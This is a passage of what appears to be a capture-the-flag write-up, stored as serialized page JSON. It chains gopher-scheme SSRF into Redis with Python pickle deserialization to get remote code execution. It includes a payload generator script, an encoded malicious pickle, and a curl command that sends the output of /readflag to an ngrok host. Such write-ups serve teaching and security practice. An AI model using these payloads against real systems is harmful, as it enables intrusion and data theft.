DIS_PORT",{"type":33,"tag":128,"props":44196,"children":44197},{"style":676},[44198],{"type":38,"value":6040},{"type":33,"tag":128,"props":44200,"children":44201},{"style":312},[44202],{"type":38,"value":26220},{"type":33,"tag":128,"props":44204,"children":44205},{"style":523},[44206],{"type":38,"value":44207}," 
6379",{"type":33,"tag":128,"props":44209,"children":44210},{"style":312},[44211],{"type":38,"value":693},{"type":33,"tag":128,"props":44213,"children":44214},{"class":130,"line":739},[44215,44219,44224,44228,44232,44236,44241,44245],{"type":33,"tag":128,"props":44216,"children":44217},{"style":676},[44218],{"type":38,"value":10362},{"type":33,"tag":128,"props":44220,"children":44221},{"style":140},[44222],{"type":38,"value":44223},"REDIS_JOBS",{"type":33,"tag":128,"props":44225,"children":44226},{"style":676},[44227],{"type":38,"value":6040},{"type":33,"tag":128,"props":44229,"children":44230},{"style":312},[44231],{"type":38,"value":26220},{"type":33,"tag":128,"props":44233,"children":44234},{"style":676},[44235],{"type":38,"value":6739},{"type":33,"tag":128,"props":44237,"children":44238},{"style":140},[44239],{"type":38,"value":44240},"jobs",{"type":33,"tag":128,"props":44242,"children":44243},{"style":676},[44244],{"type":38,"value":6040},{"type":33,"tag":128,"props":44246,"children":44247},{"style":312},[44248],{"type":38,"value":693},{"type":33,"tag":128,"props":44250,"children":44251},{"class":130,"line":765},[44252,44256,44261,44265,44269,44273,44278,44282],{"type":33,"tag":128,"props":44253,"children":44254},{"style":676},[44255],{"type":38,"value":10362},{"type":33,"tag":128,"props":44257,"children":44258},{"style":140},[44259],{"type":38,"value":44260},"REDIS_QUEUE",{"type":33,"tag":128,"props":44262,"children":44263},{"style":676},[44264],{"type":38,"value":6040},{"type":33,"tag":128,"props":44266,"children":44267},{"style":312},[44268],{"type":38,"value":26220},{"type":33,"tag":128,"props":44270,"children":44271},{"style":676},[44272],{"type":38,"value":6739},{"type":33,"tag":128,"props":44274,"children":44275},{"style":140},[44276],{"type":38,"value":44277},"jobqueue",{"type":33,"tag":128,"props":44279,"children":44280},{"style":676},[44281],{"type":38,"value":6040},{"type":33,"tag":128,"props":44283,"children":44284},{"style":312},[44285],{"type":38,"
value":693},{"type":33,"tag":128,"props":44287,"children":44288},{"class":130,"line":804},[44289,44293,44298,44302,44306],{"type":33,"tag":128,"props":44290,"children":44291},{"style":676},[44292],{"type":38,"value":10362},{"type":33,"tag":128,"props":44294,"children":44295},{"style":140},[44296],{"type":38,"value":44297},"REDIS_NUM_JOBS",{"type":33,"tag":128,"props":44299,"children":44300},{"style":676},[44301],{"type":38,"value":6040},{"type":33,"tag":128,"props":44303,"children":44304},{"style":312},[44305],{"type":38,"value":26220},{"type":33,"tag":128,"props":44307,"children":44308},{"style":523},[44309],{"type":38,"value":44310}," 100\n",{"type":33,"tag":128,"props":44312,"children":44313},{"class":130,"line":839},[44314],{"type":33,"tag":128,"props":44315,"children":44316},{"style":312},[44317],{"type":38,"value":854},{"type":33,"tag":128,"props":44319,"children":44320},{"class":130,"line":848},[44321],{"type":33,"tag":128,"props":44322,"children":44323},{"style":5541},[44324],{"type":38,"value":44325},"# 
...\n",{"type":33,"tag":128,"props":44327,"children":44328},{"class":130,"line":976},[44329,44334,44338,44343,44347,44352,44356,44360,44364,44368,44372,44377,44381,44385,44390,44394,44398,44402,44406,44410,44414,44419,44423,44428,44432,44437],{"type":33,"tag":128,"props":44330,"children":44331},{"style":323},[44332],{"type":38,"value":44333},"store",{"type":33,"tag":128,"props":44335,"children":44336},{"style":312},[44337],{"type":38,"value":215},{"type":33,"tag":128,"props":44339,"children":44340},{"style":323},[44341],{"type":38,"value":44342},"hset",{"type":33,"tag":128,"props":44344,"children":44345},{"style":312},[44346],{"type":38,"value":5566},{"type":33,"tag":128,"props":44348,"children":44349},{"style":323},[44350],{"type":38,"value":44351},"env",{"type":33,"tag":128,"props":44353,"children":44354},{"style":312},[44355],{"type":38,"value":5566},{"type":33,"tag":128,"props":44357,"children":44358},{"style":676},[44359],{"type":38,"value":6040},{"type":33,"tag":128,"props":44361,"children":44362},{"style":140},[44363],{"type":38,"value":44223},{"type":33,"tag":128,"props":44365,"children":44366},{"style":676},[44367],{"type":38,"value":6040},{"type":33,"tag":128,"props":44369,"children":44370},{"style":312},[44371],{"type":38,"value":30055},{"type":33,"tag":128,"props":44373,"children":44374},{"style":323},[44375],{"type":38,"value":44376}," 
job",{"type":33,"tag":128,"props":44378,"children":44379},{"style":312},[44380],{"type":38,"value":344},{"type":33,"tag":128,"props":44382,"children":44383},{"style":676},[44384],{"type":38,"value":6040},{"type":33,"tag":128,"props":44386,"children":44387},{"style":140},[44388],{"type":38,"value":44389},"job_id",{"type":33,"tag":128,"props":44391,"children":44392},{"style":676},[44393],{"type":38,"value":6040},{"type":33,"tag":128,"props":44395,"children":44396},{"style":312},[44397],{"type":38,"value":13540},{"type":33,"tag":128,"props":44399,"children":44400},{"style":323},[44401],{"type":38,"value":10200},{"type":33,"tag":128,"props":44403,"children":44404},{"style":312},[44405],{"type":38,"value":215},{"type":33,"tag":128,"props":44407,"children":44408},{"style":323},[44409],{"type":38,"value":10792},{"type":33,"tag":128,"props":44411,"children":44412},{"style":312},[44413],{"type":38,"value":5566},{"type":33,"tag":128,"props":44415,"children":44416},{"style":323},[44417],{"type":38,"value":44418},"pickle",{"type":33,"tag":128,"props":44420,"children":44421},{"style":312},[44422],{"type":38,"value":215},{"type":33,"tag":128,"props":44424,"children":44425},{"style":323},[44426],{"type":38,"value":44427},"dumps",{"type":33,"tag":128,"props":44429,"children":44430},{"style":312},[44431],{"type":38,"value":5566},{"type":33,"tag":128,"props":44433,"children":44434},{"style":323},[44435],{"type":38,"value":44436},"job",{"type":33,"tag":128,"props":44438,"children":44439},{"style":312},[44440],{"type":38,"value":44441},")))\n",{"type":33,"tag":47,"props":44443,"children":44444},{},[44445],{"type":38,"value":44446},"From this example, we know that our Redis query will look like this:",{"type":33,"tag":114,"props":44448,"children":44449},{},[44450],{"type":33,"tag":119,"props":44451,"children":44453},{"code":44452},"HSET jobs \u003CJOB_ID> 
\u003CBASE64_ENCODED_JOB>\n",[44454],{"type":33,"tag":105,"props":44455,"children":44456},{"__ignoreMap":8},[44457],{"type":38,"value":44452},{"type":33,"tag":47,"props":44459,"children":44460},{},[44461],{"type":38,"value":44462},"We will use this script that allows generating payloads more easily:",{"type":33,"tag":114,"props":44464,"children":44465},{"lang":10227},[44466],{"type":33,"tag":119,"props":44467,"children":44469},{"code":44468,"language":10227,"meta":8,"className":10231,"style":8},"# create_redis_payload.py\nredis_cmd = \"\"\"\u003CPAYLOAD>\"\"\"\nformted_redis_cmd = redis_cmd.replace('\\r','').replace('\\n','%0D%0A').replace(' ','%20')\nprint(f\"gopher://127.0.0.1:6379/_{formted_redis_cmd}\")\n",[44470],{"type":33,"tag":105,"props":44471,"children":44472},{"__ignoreMap":8},[44473,44481,44508,44641],{"type":33,"tag":128,"props":44474,"children":44475},{"class":130,"line":131},[44476],{"type":33,"tag":128,"props":44477,"children":44478},{"style":5541},[44479],{"type":38,"value":44480},"# create_redis_payload.py\n",{"type":33,"tag":128,"props":44482,"children":44483},{"class":130,"line":362},[44484,44489,44493,44498,44503],{"type":33,"tag":128,"props":44485,"children":44486},{"style":323},[44487],{"type":38,"value":44488},"redis_cmd ",{"type":33,"tag":128,"props":44490,"children":44491},{"style":312},[44492],{"type":38,"value":315},{"type":33,"tag":128,"props":44494,"children":44495},{"style":676},[44496],{"type":38,"value":44497}," 
\"\"\"",{"type":33,"tag":128,"props":44499,"children":44500},{"style":140},[44501],{"type":38,"value":44502},"\u003CPAYLOAD>",{"type":33,"tag":128,"props":44504,"children":44505},{"style":676},[44506],{"type":38,"value":44507},"\"\"\"\n",{"type":33,"tag":128,"props":44509,"children":44510},{"class":130,"line":403},[44511,44516,44520,44525,44529,44533,44537,44541,44546,44550,44554,44559,44563,44567,44571,44575,44579,44583,44587,44591,44596,44600,44604,44608,44612,44616,44620,44624,44628,44633,44637],{"type":33,"tag":128,"props":44512,"children":44513},{"style":323},[44514],{"type":38,"value":44515},"formted_redis_cmd ",{"type":33,"tag":128,"props":44517,"children":44518},{"style":312},[44519],{"type":38,"value":315},{"type":33,"tag":128,"props":44521,"children":44522},{"style":323},[44523],{"type":38,"value":44524}," redis_cmd",{"type":33,"tag":128,"props":44526,"children":44527},{"style":312},[44528],{"type":38,"value":215},{"type":33,"tag":128,"props":44530,"children":44531},{"style":323},[44532],{"type":38,"value":16487},{"type":33,"tag":128,"props":44534,"children":44535},{"style":312},[44536],{"type":38,"value":5566},{"type":33,"tag":128,"props":44538,"children":44539},{"style":676},[44540],{"type":38,"value":6040},{"type":33,"tag":128,"props":44542,"children":44543},{"style":151},[44544],{"type":38,"value":44545},"\\r",{"type":33,"tag":128,"props":44547,"children":44548},{"style":676},[44549],{"type":38,"value":6040},{"type":33,"tag":128,"props":44551,"children":44552},{"style":312},[44553],{"type":38,"value":5584},{"type":33,"tag":128,"props":44555,"children":44556},{"style":676},[44557],{"type":38,"value":44558},"''",{"type":33,"tag":128,"props":44560,"children":44561},{"style":312},[44562],{"type":38,"value":6700},{"type":33,"tag":128,"props":44564,"children":44565},{"style":323},[44566],{"type":38,"value":16487},{"type":33,"tag":128,"props":44568,"children":44569},{"style":312},[44570],{"type":38,"value":5566},{"type":33,"tag":128,"props":44572,"children":4
4573},{"style":676},[44574],{"type":38,"value":6040},{"type":33,"tag":128,"props":44576,"children":44577},{"style":151},[44578],{"type":38,"value":38268},{"type":33,"tag":128,"props":44580,"children":44581},{"style":676},[44582],{"type":38,"value":6040},{"type":33,"tag":128,"props":44584,"children":44585},{"style":312},[44586],{"type":38,"value":5584},{"type":33,"tag":128,"props":44588,"children":44589},{"style":676},[44590],{"type":38,"value":6040},{"type":33,"tag":128,"props":44592,"children":44593},{"style":140},[44594],{"type":38,"value":44595},"%0D%0A",{"type":33,"tag":128,"props":44597,"children":44598},{"style":676},[44599],{"type":38,"value":6040},{"type":33,"tag":128,"props":44601,"children":44602},{"style":312},[44603],{"type":38,"value":6700},{"type":33,"tag":128,"props":44605,"children":44606},{"style":323},[44607],{"type":38,"value":16487},{"type":33,"tag":128,"props":44609,"children":44610},{"style":312},[44611],{"type":38,"value":5566},{"type":33,"tag":128,"props":44613,"children":44614},{"style":676},[44615],{"type":38,"value":6040},{"type":33,"tag":128,"props":44617,"children":44618},{"style":676},[44619],{"type":38,"value":6739},{"type":33,"tag":128,"props":44621,"children":44622},{"style":312},[44623],{"type":38,"value":5584},{"type":33,"tag":128,"props":44625,"children":44626},{"style":676},[44627],{"type":38,"value":6040},{"type":33,"tag":128,"props":44629,"children":44630},{"style":140},[44631],{"type":38,"value":44632},"%20",{"type":33,"tag":128,"props":44634,"children":44635},{"style":676},[44636],{"type":38,"value":6040},{"type":33,"tag":128,"props":44638,"children":44639},{"style":312},[44640],{"type":38,"value":2427},{"type":33,"tag":128,"props":44642,"children":44643},{"class":130,"line":739},[44644,44648,44652,44656,44661,44665,44670,44674,44678],{"type":33,"tag":128,"props":44645,"children":44646},{"style":437},[44647],{"type":38,"value":31388},{"type":33,"tag":128,"props":44649,"children":44650},{"style":312},[44651],{"type":38,"value"
:5566},{"type":33,"tag":128,"props":44653,"children":44654},{"style":300},[44655],{"type":38,"value":11107},{"type":33,"tag":128,"props":44657,"children":44658},{"style":140},[44659],{"type":38,"value":44660},"\"gopher://127.0.0.1:6379/_",{"type":33,"tag":128,"props":44662,"children":44663},{"style":151},[44664],{"type":38,"value":7246},{"type":33,"tag":128,"props":44666,"children":44667},{"style":323},[44668],{"type":38,"value":44669},"formted_redis_cmd",{"type":33,"tag":128,"props":44671,"children":44672},{"style":151},[44673],{"type":38,"value":5730},{"type":33,"tag":128,"props":44675,"children":44676},{"style":140},[44677],{"type":38,"value":669},{"type":33,"tag":128,"props":44679,"children":44680},{"style":312},[44681],{"type":38,"value":2427},{"type":33,"tag":47,"props":44683,"children":44684},{},[44685],{"type":38,"value":44686},"We can now create a payload to see if we can modify the keys of the Redis database.",{"type":33,"tag":114,"props":44688,"children":44689},{},[44690],{"type":33,"tag":119,"props":44691,"children":44693},{"code":44692},"HSET jobs 101 AAAAAAAAA\nHGET jobs 101\nquit\n",[44694],{"type":33,"tag":105,"props":44695,"children":44696},{"__ignoreMap":8},[44697],{"type":38,"value":44692},{"type":33,"tag":47,"props":44699,"children":44700},{},[44701,44703,44708,44710,44716,44718,44723,44725,44730],{"type":38,"value":44702},"Here we set at the key ",{"type":33,"tag":105,"props":44704,"children":44706},{"className":44705},[],[44707],{"type":38,"value":44240},{"type":38,"value":44709}," the value ",{"type":33,"tag":105,"props":44711,"children":44713},{"className":44712},[],[44714],{"type":38,"value":44715},"AAAAAAAAAA",{"type":38,"value":44717}," at the index ",{"type":33,"tag":105,"props":44719,"children":44721},{"className":44720},[],[44722],{"type":38,"value":32839},{"type":38,"value":44724},". 
and we get the value at the index ",{"type":33,"tag":105,"props":44726,"children":44728},{"className":44727},[],[44729],{"type":38,"value":32839},{"type":38,"value":215},{"type":33,"tag":47,"props":44732,"children":44733},{},[44734],{"type":38,"value":44735},"With the result of the previous script, we have the following payload:",{"type":33,"tag":114,"props":44737,"children":44738},{},[44739],{"type":33,"tag":119,"props":44740,"children":44742},{"code":44741},"{\"trapName\":\"hello\",\"trapURL\":\"gopher://127.0.0.1:6379/_%0D%0AHSET%20jobs%20101%20AAAAAAAAA%0D%0AHGET%20jobs%20101%0D%0Aquit%0D%0A\"}\n",[44743],{"type":33,"tag":105,"props":44744,"children":44745},{"__ignoreMap":8},[44746],{"type":38,"value":44741},{"type":33,"tag":47,"props":44748,"children":44749},{},[44750],{"type":38,"value":44751},"And we have the result:",{"type":33,"tag":114,"props":44753,"children":44754},{},[44755],{"type":33,"tag":119,"props":44756,"children":44758},{"code":44757},":0\n$9\nAAAAAAAAA\n+OK\n",[44759],{"type":33,"tag":105,"props":44760,"children":44761},{"__ignoreMap":8},[44762],{"type":38,"value":44757},{"type":33,"tag":47,"props":44764,"children":44765},{},[44766],{"type":38,"value":44767},"With this payload, we have shown that it is possible to pollute a key that is located in Redis.",{"type":33,"tag":40,"props":44769,"children":44771},{"id":44770},"rce-via-unpickle",[44772],{"type":38,"value":44773},"RCE via unpickle",{"type":33,"tag":47,"props":44775,"children":44776},{},[44777,44779,44785,44787,44793],{"type":38,"value":44778},"If we take a look at the ",{"type":33,"tag":105,"props":44780,"children":44782},{"className":44781},[],[44783],{"type":38,"value":44784},"get_job_queue",{"type":38,"value":44786}," function in ",{"type":33,"tag":105,"props":44788,"children":44790},{"className":44789},[],[44791],{"type":38,"value":44792},"cache.py",{"type":38,"value":44794},", we can see that this function retrieves a key from Redis, and then unpickle 
it.",{"type":33,"tag":114,"props":44796,"children":44797},{"lang":10227},[44798],{"type":33,"tag":119,"props":44799,"children":44801},{"code":44800,"language":10227,"meta":8,"className":10231,"style":8},"def get_job_queue(job_id):\n    data = current_app.redis.hget(env('REDIS_JOBS'), job_id)\n    if data:\n        return pickle.loads(base64.b64decode(data))\n    return None\n",[44802],{"type":33,"tag":105,"props":44803,"children":44804},{"__ignoreMap":8},[44805,44829,44901,44916,44967],{"type":33,"tag":128,"props":44806,"children":44807},{"class":130,"line":131},[44808,44812,44817,44821,44825],{"type":33,"tag":128,"props":44809,"children":44810},{"style":300},[44811],{"type":38,"value":10402},{"type":33,"tag":128,"props":44813,"children":44814},{"style":135},[44815],{"type":38,"value":44816}," get_job_queue",{"type":33,"tag":128,"props":44818,"children":44819},{"style":312},[44820],{"type":38,"value":5566},{"type":33,"tag":128,"props":44822,"children":44823},{"style":323},[44824],{"type":38,"value":44389},{"type":33,"tag":128,"props":44826,"children":44827},{"style":312},[44828],{"type":38,"value":10497},{"type":33,"tag":128,"props":44830,"children":44831},{"class":130,"line":362},[44832,44837,44841,44846,44850,44855,44859,44864,44868,44872,44876,44880,44884,44888,44892,44897],{"type":33,"tag":128,"props":44833,"children":44834},{"style":323},[44835],{"type":38,"value":44836},"    data ",{"type":33,"tag":128,"props":44838,"children":44839},{"style":312},[44840],{"type":38,"value":315},{"type":33,"tag":128,"props":44842,"children":44843},{"style":323},[44844],{"type":38,"value":44845}," 
current_app",{"type":33,"tag":128,"props":44847,"children":44848},{"style":312},[44849],{"type":38,"value":215},{"type":33,"tag":128,"props":44851,"children":44852},{"style":323},[44853],{"type":38,"value":44854},"redis",{"type":33,"tag":128,"props":44856,"children":44857},{"style":312},[44858],{"type":38,"value":215},{"type":33,"tag":128,"props":44860,"children":44861},{"style":323},[44862],{"type":38,"value":44863},"hget",{"type":33,"tag":128,"props":44865,"children":44866},{"style":312},[44867],{"type":38,"value":5566},{"type":33,"tag":128,"props":44869,"children":44870},{"style":323},[44871],{"type":38,"value":44351},{"type":33,"tag":128,"props":44873,"children":44874},{"style":312},[44875],{"type":38,"value":5566},{"type":33,"tag":128,"props":44877,"children":44878},{"style":676},[44879],{"type":38,"value":6040},{"type":33,"tag":128,"props":44881,"children":44882},{"style":140},[44883],{"type":38,"value":44223},{"type":33,"tag":128,"props":44885,"children":44886},{"style":676},[44887],{"type":38,"value":6040},{"type":33,"tag":128,"props":44889,"children":44890},{"style":312},[44891],{"type":38,"value":30055},{"type":33,"tag":128,"props":44893,"children":44894},{"style":323},[44895],{"type":38,"value":44896}," 
job_id",{"type":33,"tag":128,"props":44898,"children":44899},{"style":312},[44900],{"type":38,"value":2427},{"type":33,"tag":128,"props":44902,"children":44903},{"class":130,"line":403},[44904,44908,44912],{"type":33,"tag":128,"props":44905,"children":44906},{"style":1576},[44907],{"type":38,"value":6625},{"type":33,"tag":128,"props":44909,"children":44910},{"style":323},[44911],{"type":38,"value":13545},{"type":33,"tag":128,"props":44913,"children":44914},{"style":312},[44915],{"type":38,"value":5318},{"type":33,"tag":128,"props":44917,"children":44918},{"class":130,"line":739},[44919,44923,44928,44932,44937,44941,44946,44950,44955,44959,44963],{"type":33,"tag":128,"props":44920,"children":44921},{"style":1576},[44922],{"type":38,"value":13615},{"type":33,"tag":128,"props":44924,"children":44925},{"style":323},[44926],{"type":38,"value":44927}," pickle",{"type":33,"tag":128,"props":44929,"children":44930},{"style":312},[44931],{"type":38,"value":215},{"type":33,"tag":128,"props":44933,"children":44934},{"style":323},[44935],{"type":38,"value":44936},"loads",{"type":33,"tag":128,"props":44938,"children":44939},{"style":312},[44940],{"type":38,"value":5566},{"type":33,"tag":128,"props":44942,"children":44943},{"style":323},[44944],{"type":38,"value":44945},"base64",{"type":33,"tag":128,"props":44947,"children":44948},{"style":312},[44949],{"type":38,"value":215},{"type":33,"tag":128,"props":44951,"children":44952},{"style":323},[44953],{"type":38,"value":44954},"b64decode",{"type":33,"tag":128,"props":44956,"children":44957},{"style":312},[44958],{"type":38,"value":5566},{"type":33,"tag":128,"props":44960,"children":44961},{"style":323},[44962],{"type":38,"value":2815},{"type":33,"tag":128,"props":44964,"children":44965},{"style":312},[44966],{"type":38,"value":2459},{"type":33,"tag":128,"props":44968,"children":44969},{"class":130,"line":765},[44970,44974],{"type":33,"tag":128,"props":44971,"children":44972},{"style":1576},[44973],{"type":38,"value":6810},{"type":33
,"tag":128,"props":44975,"children":44976},{"style":1576},[44977],{"type":38,"value":44978}," None\n",{"type":33,"tag":47,"props":44980,"children":44981},{},[44982,44984,44990],{"type":38,"value":44983},"This function is used when we call the route ",{"type":33,"tag":105,"props":44985,"children":44987},{"className":44986},[],[44988],{"type":38,"value":44989},"/admin/jobs/\u003Cjob_id>",{"type":38,"value":215},{"type":33,"tag":47,"props":44992,"children":44993},{},[44994],{"type":38,"value":44995},"Unpickle in Python without any protection is quite vulnerable as it allows malicious code to be executed on the Python server.",{"type":33,"tag":47,"props":44997,"children":44998},{},[44999],{"type":38,"value":45000},"If we resume our path. We know that it is now possible to change a value corresponding to the id of a job in Redis, that an unpickle which takes a value from Redis is vulnerable and allows us to execute malicious code.",{"type":33,"tag":47,"props":45002,"children":45003},{},[45004],{"type":38,"value":45005},"Now, we just need to craft our payload that will be executed by unpickle. 
And call the route that will be responsible for unpickling in order to achieve RCE.",{"type":33,"tag":47,"props":45007,"children":45008},{},[45009],{"type":38,"value":45010},"We will use the following script to generate our base64 pickle payload:",{"type":33,"tag":114,"props":45012,"children":45013},{"lang":10227},[45014],{"type":33,"tag":119,"props":45015,"children":45017},{"code":45016,"language":10227,"meta":8,"className":10231,"style":8},"# create_pickle_payload.py\n# create_pickle_payload.py\nimport pickle\nimport base64\n\nclass RCE:\n    def __reduce__(self):\n        import os\n        cmd = ('curl \"http://b536-91-69-133-214.ngrok.io/\"$(/readflag | base64)')\n        return os.system, (cmd,)\n\n\nif __name__ == '__main__':\n    pickled = pickle.dumps(RCE())\n    print(base64.urlsafe_b64encode(pickled).decode())\n",[45018],{"type":33,"tag":105,"props":45019,"children":45020},{"__ignoreMap":8},[45021,45029,45036,45048,45059,45066,45082,45106,45119,45152,45191,45198,45205,45236,45274],{"type":33,"tag":128,"props":45022,"children":45023},{"class":130,"line":131},[45024],{"type":33,"tag":128,"props":45025,"children":45026},{"style":5541},[45027],{"type":38,"value":45028},"# create_pickle_payload.py\n",{"type":33,"tag":128,"props":45030,"children":45031},{"class":130,"line":362},[45032],{"type":33,"tag":128,"props":45033,"children":45034},{"style":5541},[45035],{"type":38,"value":45028},{"type":33,"tag":128,"props":45037,"children":45038},{"class":130,"line":403},[45039,45043],{"type":33,"tag":128,"props":45040,"children":45041},{"style":1576},[45042],{"type":38,"value":10244},{"type":33,"tag":128,"props":45044,"children":45045},{"style":323},[45046],{"type":38,"value":45047}," 
pickle\n",{"type":33,"tag":128,"props":45049,"children":45050},{"class":130,"line":739},[45051,45055],{"type":33,"tag":128,"props":45052,"children":45053},{"style":1576},[45054],{"type":38,"value":10244},{"type":33,"tag":128,"props":45056,"children":45057},{"style":323},[45058],{"type":38,"value":10261},{"type":33,"tag":128,"props":45060,"children":45061},{"class":130,"line":765},[45062],{"type":33,"tag":128,"props":45063,"children":45064},{"emptyLinePlaceholder":896},[45065],{"type":38,"value":899},{"type":33,"tag":128,"props":45067,"children":45068},{"class":130,"line":804},[45069,45073,45078],{"type":33,"tag":128,"props":45070,"children":45071},{"style":300},[45072],{"type":38,"value":30336},{"type":33,"tag":128,"props":45074,"children":45075},{"style":30339},[45076],{"type":38,"value":45077}," RCE",{"type":33,"tag":128,"props":45079,"children":45080},{"style":312},[45081],{"type":38,"value":5318},{"type":33,"tag":128,"props":45083,"children":45084},{"class":130,"line":839},[45085,45089,45094,45098,45102],{"type":33,"tag":128,"props":45086,"children":45087},{"style":300},[45088],{"type":38,"value":30678},{"type":33,"tag":128,"props":45090,"children":45091},{"style":437},[45092],{"type":38,"value":45093}," __reduce__",{"type":33,"tag":128,"props":45095,"children":45096},{"style":312},[45097],{"type":38,"value":5566},{"type":33,"tag":128,"props":45099,"children":45100},{"style":323},[45101],{"type":38,"value":30091},{"type":33,"tag":128,"props":45103,"children":45104},{"style":312},[45105],{"type":38,"value":10497},{"type":33,"tag":128,"props":45107,"children":45108},{"class":130,"line":848},[45109,45114],{"type":33,"tag":128,"props":45110,"children":45111},{"style":1576},[45112],{"type":38,"value":45113},"        import",{"type":33,"tag":128,"props":45115,"children":45116},{"style":323},[45117],{"type":38,"value":45118}," 
os\n",{"type":33,"tag":128,"props":45120,"children":45121},{"class":130,"line":976},[45122,45127,45131,45135,45139,45144,45148],{"type":33,"tag":128,"props":45123,"children":45124},{"style":323},[45125],{"type":38,"value":45126},"        cmd ",{"type":33,"tag":128,"props":45128,"children":45129},{"style":312},[45130],{"type":38,"value":315},{"type":33,"tag":128,"props":45132,"children":45133},{"style":312},[45134],{"type":38,"value":2852},{"type":33,"tag":128,"props":45136,"children":45137},{"style":676},[45138],{"type":38,"value":6040},{"type":33,"tag":128,"props":45140,"children":45141},{"style":140},[45142],{"type":38,"value":45143},"curl \"http://b536-91-69-133-214.ngrok.io/\"$(/readflag | base64)",{"type":33,"tag":128,"props":45145,"children":45146},{"style":676},[45147],{"type":38,"value":6040},{"type":33,"tag":128,"props":45149,"children":45150},{"style":312},[45151],{"type":38,"value":2427},{"type":33,"tag":128,"props":45153,"children":45154},{"class":130,"line":988},[45155,45159,45164,45168,45173,45177,45181,45186],{"type":33,"tag":128,"props":45156,"children":45157},{"style":1576},[45158],{"type":38,"value":13615},{"type":33,"tag":128,"props":45160,"children":45161},{"style":323},[45162],{"type":38,"value":45163}," 
os",{"type":33,"tag":128,"props":45165,"children":45166},{"style":312},[45167],{"type":38,"value":215},{"type":33,"tag":128,"props":45169,"children":45170},{"style":323},[45171],{"type":38,"value":45172},"system",{"type":33,"tag":128,"props":45174,"children":45175},{"style":312},[45176],{"type":38,"value":5584},{"type":33,"tag":128,"props":45178,"children":45179},{"style":312},[45180],{"type":38,"value":2852},{"type":33,"tag":128,"props":45182,"children":45183},{"style":323},[45184],{"type":38,"value":45185},"cmd",{"type":33,"tag":128,"props":45187,"children":45188},{"style":312},[45189],{"type":38,"value":45190},",)\n",{"type":33,"tag":128,"props":45192,"children":45193},{"class":130,"line":1001},[45194],{"type":33,"tag":128,"props":45195,"children":45196},{"emptyLinePlaceholder":896},[45197],{"type":38,"value":899},{"type":33,"tag":128,"props":45199,"children":45200},{"class":130,"line":1014},[45201],{"type":33,"tag":128,"props":45202,"children":45203},{"emptyLinePlaceholder":896},[45204],{"type":38,"value":899},{"type":33,"tag":128,"props":45206,"children":45207},{"class":130,"line":1026},[45208,45212,45216,45220,45224,45228,45232],{"type":33,"tag":128,"props":45209,"children":45210},{"style":1576},[45211],{"type":38,"value":10991},{"type":33,"tag":128,"props":45213,"children":45214},{"style":437},[45215],{"type":38,"value":10996},{"type":33,"tag":128,"props":45217,"children":45218},{"style":300},[45219],{"type":38,"value":11001},{"type":33,"tag":128,"props":45221,"children":45222},{"style":676},[45223],{"type":38,"value":6739},{"type":33,"tag":128,"props":45225,"children":45226},{"style":140},[45227],{"type":38,"value":11010},{"type":33,"tag":128,"props":45229,"children":45230},{"style":676},[45231],{"type":38,"value":6040},{"type":33,"tag":128,"props":45233,"children":45234},{"style":312},[45235],{"type":38,"value":5318},{"type":33,"tag":128,"props":45237,"children":45238},{"class":130,"line":1038},[45239,45244,45248,45252,45256,45260,45264,45269],{"type":33,"t
ag":128,"props":45240,"children":45241},{"style":323},[45242],{"type":38,"value":45243},"    pickled ",{"type":33,"tag":128,"props":45245,"children":45246},{"style":312},[45247],{"type":38,"value":315},{"type":33,"tag":128,"props":45249,"children":45250},{"style":323},[45251],{"type":38,"value":44927},{"type":33,"tag":128,"props":45253,"children":45254},{"style":312},[45255],{"type":38,"value":215},{"type":33,"tag":128,"props":45257,"children":45258},{"style":323},[45259],{"type":38,"value":44427},{"type":33,"tag":128,"props":45261,"children":45262},{"style":312},[45263],{"type":38,"value":5566},{"type":33,"tag":128,"props":45265,"children":45266},{"style":323},[45267],{"type":38,"value":45268},"RCE",{"type":33,"tag":128,"props":45270,"children":45271},{"style":312},[45272],{"type":38,"value":45273},"())\n",{"type":33,"tag":128,"props":45275,"children":45276},{"class":130,"line":1051},[45277,45281,45285,45289,45293,45298,45302,45307,45311,45315],{"type":33,"tag":128,"props":45278,"children":45279},{"style":437},[45280],{"type":38,"value":10650},{"type":33,"tag":128,"props":45282,"children":45283},{"style":312},[45284],{"type":38,"value":5566},{"type":33,"tag":128,"props":45286,"children":45287},{"style":323},[45288],{"type":38,"value":44945},{"type":33,"tag":128,"props":45290,"children":45291},{"style":312},[45292],{"type":38,"value":215},{"type":33,"tag":128,"props":45294,"children":45295},{"style":323},[45296],{"type":38,"value":45297},"urlsafe_b64encode",{"type":33,"tag":128,"props":45299,"children":45300},{"style":312},[45301],{"type":38,"value":5566},{"type":33,"tag":128,"props":45303,"children":45304},{"style":323},[45305],{"type":38,"value":45306},"pickled",{"type":33,"tag":128,"props":45308,"children":45309},{"style":312},[45310],{"type":38,"value":6700},{"type":33,"tag":128,"props":45312,"children":45313},{"style":323},[45314],{"type":38,"value":10820},{"type":33,"tag":128,"props":45316,"children":45317},{"style":312},[45318],{"type":38,"value":45273},{"typ
e":33,"tag":114,"props":45320,"children":45321},{},[45322],{"type":33,"tag":119,"props":45323,"children":45325},{"code":45324},"$> python pickle_rce.py\ngASVWgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjD9jdXJsICJodHRwOi8vYjUzNi05MS02OS0xMzMtMjE0Lm5ncm9rLmlvLyIkKC9yZWFkZmxhZyB8IGJhc2U2NCmUhZRSlC4=\n",[45326],{"type":33,"tag":105,"props":45327,"children":45328},{"__ignoreMap":8},[45329],{"type":38,"value":45324},{"type":33,"tag":47,"props":45331,"children":45332},{},[45333],{"type":38,"value":45334},"Now that we have the value of the key, we need to use it in our script that allows us to change the keys in Redis. This is necessary for us to have the final payload.",{"type":33,"tag":114,"props":45336,"children":45337},{},[45338],{"type":33,"tag":119,"props":45339,"children":45341},{"code":45340},"HSET jobs 101 gASVWgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjD9jdXJsICJodHRwOi8vYjUzNi05MS02OS0xMzMtMjE0Lm5ncm9rLmlvLyIkKC9yZWFkZmxhZyB8IGJhc2U2NCmUhZRSlC4=\nHGET jobs 101\nquit\n",[45342],{"type":33,"tag":105,"props":45343,"children":45344},{"__ignoreMap":8},[45345],{"type":38,"value":45340},{"type":33,"tag":114,"props":45347,"children":45348},{},[45349],{"type":33,"tag":119,"props":45350,"children":45352},{"code":45351},"POST /api/tracks/add HTTP/1.1\nHost: localhost:1337\nReferer: http://localhost:1337/admin/\nContent-Type: application/json\nContent-Length: 259\nOrigin: http://localhost:1337\nConnection: close\nCookie: 